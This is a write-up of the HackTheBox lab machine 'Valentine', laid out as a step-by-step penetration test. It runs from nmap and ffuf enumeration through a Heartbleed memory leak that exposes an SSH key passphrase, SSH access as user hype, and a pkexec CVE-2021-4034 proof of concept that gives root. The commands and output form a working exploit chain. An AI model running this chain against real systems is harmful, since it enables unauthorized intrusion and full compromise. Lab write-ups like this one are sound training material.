HackTheBox - Valentine

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #ffuf #linux

A Linux machine named after its core vulnerability — a memory disclosure flaw in OpenSSL leaks just enough data to decrypt an encrypted RSA key found hiding in the web server’s directory listing.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ target=10.129.232.136; ports=$(nmap -p- --min-rate=1000 -T4 "$target" 2>/dev/null | awk -F/ '/^[0-9]+\/tcp/ && /open/ {print $1}' | paste -sd, -); nmap -p"$ports" -sC -sV "$target"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-17 09:01 EST
Nmap scan report for 10.129.232.136
Host is up (0.25s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_ssl-date: 2026-02-17T14:02:05+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.53 seconds

Foothold

Hostname Setup

Add the vhost to hosts file.

1
$ echo '10.129.232.136 valentine.htb' | sudo tee -a /etc/hosts

Web Enumeration

Use ffuf to enumerate directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ ffuf -c -u http://valentine.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://valentine.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.hta                    [Status: 403, Size: 285, Words: 21, Lines: 11, Duration: 132ms]
                        [Status: 200, Size: 38, Words: 2, Lines: 2, Duration: 611ms]
.htpasswd               [Status: 403, Size: 290, Words: 21, Lines: 11, Duration: 2690ms]
.htaccess               [Status: 403, Size: 290, Words: 21, Lines: 11, Duration: 4614ms]
cgi-bin/                [Status: 403, Size: 289, Words: 21, Lines: 11, Duration: 123ms]
decode                  [Status: 200, Size: 552, Words: 73, Lines: 26, Duration: 124ms]
dev                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 140ms]
encode                  [Status: 200, Size: 554, Words: 73, Lines: 28, Duration: 151ms]
index                   [Status: 200, Size: 38, Words: 2, Lines: 2, Duration: 302ms]
index.php               [Status: 200, Size: 38, Words: 2, Lines: 2, Duration: 314ms]
server-status           [Status: 403, Size: 294, Words: 21, Lines: 11, Duration: 125ms]
:: Progress: [4614/4614] :: Job [1/1] :: 248 req/sec :: Duration: [0:00:21] :: Errors: 0 ::

We find the following routes:

1
2
3
decode
dev
encode

In the /dev directory we find notes.txt, which tells us the encoding and decoding are done server-side. The directory also includes hype_key, which is a hex encoded, encrypted RSA key that we will need a passphrase to decrypt.

So, the next goal is to find a passphrase to decrypt it.

Vulnerability Discovery

Using the vuln script to detect vulnerabilities with nmap, we found that port 443 is vulnerable to CVE-2014-0160, an SSL Heartbleed issue that can reveal sensitive information from parts of memory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ sudo nmap --script=vuln -sV -p80,443 valentine.htb
443/tcp open  ssl/http Apache httpd 2.2.22
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
<-SNIP->
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt 
|_      http://cvedetails.com/cve/2014-0160/
<-SNIP->

Heartbleed Memory Leak

We use Metasploit’s openssl_heartbleed auxiliary module to retrieve memory leaks.

1
2
3
4
5
6
7
8
9
10
11
$ msfconsole -q -x "use auxiliary/scanner/ssl/openssl_heartbleed; set RHOSTS valentine.htb; set LEAK_COUNT 10; run;"
RHOSTS => valentine.htb
LEAK_COUNT => 10
[+] 10.129.232.136:443    - Heartbeat response with leak, 655350 bytes
[*] valentine.htb:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssl/openssl_heartbleed) > dump
[+] 10.129.232.136:443    - Heartbeat response with leak, 655350 bytes
[+] 10.129.232.136:443    - Heartbeat data stored in /home/kali/.msf4/loot/20260217135153_default_10.129.232.136_openssl.heartble_282878.bin
[*] valentine.htb:443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Upon inspecting the dump, we find a base64-encoded value.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ cat /home/kali/.msf4/loot/20260217135153_default_10.129.232.136_openssl.heartble_282878.bin

�`g�]b�f��oC0/A��Ϳ�vI���
"�!98����5����
��      ��32��ED��/�A���
                        �      �ux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Referer: https://127.0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==���Uͱ=n�աI��כ�vg


<--SNIP-->

Decode it:

1
2
$ echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
heartbleedbelievethehype

Key Recovery and Decryption

Grab the key and attempt to decrypt it using the recovered phrase.

1
$ curl http://valentine.htb/dev/hype_key -o hype-key

Convert the hex to a PEM file:

1
$ xxd -r -p hype-key key.pem

Now key.pem should look like this:

1
2
3
4
5
6
7
$ cat key.pem 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

<-SNIP->
-----END RSA PRIVATE KEY-----

Decrypt it using the passphrase heartbleedbelievethehype:

1
2
3
4
$ openssl rsa -in key.pem -out decrypted_key.pem

Enter pass phrase for key.pem:
writing RSA key

Since the file is called hype_key, attempt SSH login as hype using the decrypted key.

1
$ chmod 600 decrypted_key.pem

SSH Access

Trying to connect initially fails because the client uses modern OpenSSH, while the server expects old RSA SHA-1 signatures. ModernSSH 8.8+ disables ssh-rsa by default.

1
2
3
$ ssh hype@valentine.htb -i found.pem
sign_and_send_pubkey: no mutual signature supported
hype@valentine.htb's password:

Connect again by explicitly enabling ssh-rsa:

1
2
3
4
ssh -i decrypted_key.pem \
-o HostKeyAlgorithms=+ssh-rsa \
-o PubkeyAcceptedAlgorithms=+ssh-rsa \
hype@valentine.htb

We have successfully logged in.

Privilege Escalation

Enumeration

Copy linPEAS to /tmp to search for local privilege escalation paths.

1
2
3
4
$ scp -i decrypted_key.pem \                                                                
-o HostKeyAlgorithms=+ssh-rsa \
-o PubkeyAcceptedAlgorithms=+ssh-rsa \
linpeas.sh hype@valentine.htb:/tmp/

After running linPEAS, the following potential issue is identified:

1
2
3
4
5
6
7
8
9
10
hype@Valentine:/tmp$ chmod +x linpeas.sh
hype@Valentine:/tmp$ ./linpeas.sh

<-SNIP->
══╣ Polkit Binary
Pkexec binary found at: /usr/bin/pkexec                                                                                         
Pkexec binary has SUID bit set!
-rwsr-xr-x 1 root root 23184 Jan  6  2012 /usr/bin/pkexec
pkexec version 0.104
<-SNIP->

pkexec version 0.104 is vulnerable to CVE-2021-4034, a local privilege escalation flaw in Polkit’s pkexec utility.

Exploit

Use this PoC. Clone the repository:

1
$ git clone https://github.com/ryaagard/CVE-2021-4034.git

Transfer the files to the target:

1
2
3
4
5
6
$ cd CVE-2021-4034

$ scp -i ../decrypted_key.pem \
-o HostKeyAlgorithms=+ssh-rsa \
-o PubkeyAcceptedAlgorithms=+ssh-rsa \
Makefile evil-so.c exploit.c hype@valentine.htb:/tmp/

Compile and run the exploit:

1
2
3
4
5
6
hype@Valentine:/tmp$ gcc -shared -o evil.so -fPIC evil-so.c
hype@Valentine:/tmp$ gcc exploit.c -o exploit
hype@Valentine:/tmp$ ./exploit
# whoami
root
#